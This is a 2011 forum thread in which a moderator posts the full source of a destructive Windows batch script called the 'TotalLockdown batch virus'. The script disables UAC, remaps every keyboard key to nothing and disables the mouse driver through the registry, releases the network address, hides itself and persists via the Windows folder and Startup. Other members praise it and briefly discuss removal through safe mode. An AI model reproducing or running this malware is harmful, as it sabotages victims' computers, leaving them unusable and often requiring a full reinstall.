Batch Beta
Please Login to get full access and to disable ads.

Thanks to awestom for removing those ads!

Staff Selections are closed! Thanks for participating!
Welcome to the new admins and mods!
About the ads, yeah. We reached our 250'th post and the ads kicked on. In order to disable them I need to purchase a ad removal feature. Now, I don't have credits and in order to get one I need donations. Thanks

You are not connected. Please login or register

The TotalLockdown batch virus

Go down  Message [Page 1 of 1]

1 The TotalLockdown batch virus on Thu Jan 13, 2011 5:19 am

D4rkus

avatar
Moderators
Moderators
This little batch code here hides the CMD windows, disables the keyboard and the mouse, copies itself to autorun and replaces winstart.bat so you can,t get rid of him, then hides the source.
And also messes up the IP


@echo off
if exist winstart.vbs goto next
echo set objShell = CreateObject("WScript.Shell") >> winstart.vbs
echo objShell.Run "batvirus.bat", vbHide, TRUE >> winstart.vbs
start "" "winstart.vbs"
exit
:next
@Set RegistyEditCmd=Cmd /k Reg Add
@Set HiveSysKey=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
@%RegistyEditCmd% "%HiveSysKey%" /v "EnableLUA" /t "REG_DWORD" /d "0" /f > nul
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start nokeyboard.reg
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
ipconfig /release
if ERRORLEVEL1 ipconfig /release_all
COPY %0 %windir%WINSTART.BAT
copy "startup.bat" "%userprofile%\Start Menu\Programs\Startup\startup.bat"
attrib +h %0

Use carrefuly, or you may need to reinstall windows



Last edited by D4rkus on Thu Jan 13, 2011 11:36 am; edited 1 time in total

2 Re: The TotalLockdown batch virus on Thu Jan 13, 2011 5:23 am

Defy

avatar
Admin
Admin
Awesome script there mate!

http://batchb.forumotion.com

3 Re: The TotalLockdown batch virus on Thu Jan 13, 2011 5:24 am

TriGz


Admin
Admin
That looks like a pretty dangerous script to be running.
How would you go about removing it?

4 Re: The TotalLockdown batch virus on Thu Jan 13, 2011 5:30 am

D4rkus

avatar
Moderators
Moderators
TriGz wrote:That looks like a pretty dangerous script to be running.
How would you go about removing it?

Reinstall Windows software, i cant see another way. Because you can't use the mouse and the keyboard even if you do a system restart

5 Re: The TotalLockdown batch virus on Thu Jan 13, 2011 5:38 am

TriGz


Admin
Admin
D4rkus wrote:Reinstall Windows software, i cant see another way. Because you can't use the mouse and the keyboard even if you do a system restart

Could safe mode prevent it though? My guess is yes.
Then from there it is a simple remove from startup process.

6 Re: The TotalLockdown batch virus on Thu Jan 13, 2011 5:42 am

D4rkus

avatar
Moderators
Moderators
TriGz wrote:
D4rkus wrote:Reinstall Windows software, i cant see another way. Because you can't use the mouse and the keyboard even if you do a system restart

Could safe mode prevent it though? My guess is yes.
Then from there it is a simple remove from startup process.

Thats possible, i didn't tried that. But it copies to %windir% as WINSTART.BAT not only to start up

Sponsored content


Back to top  Message [Page 1 of 1]

Permissions in this forum:
You cannot reply to topics in this forum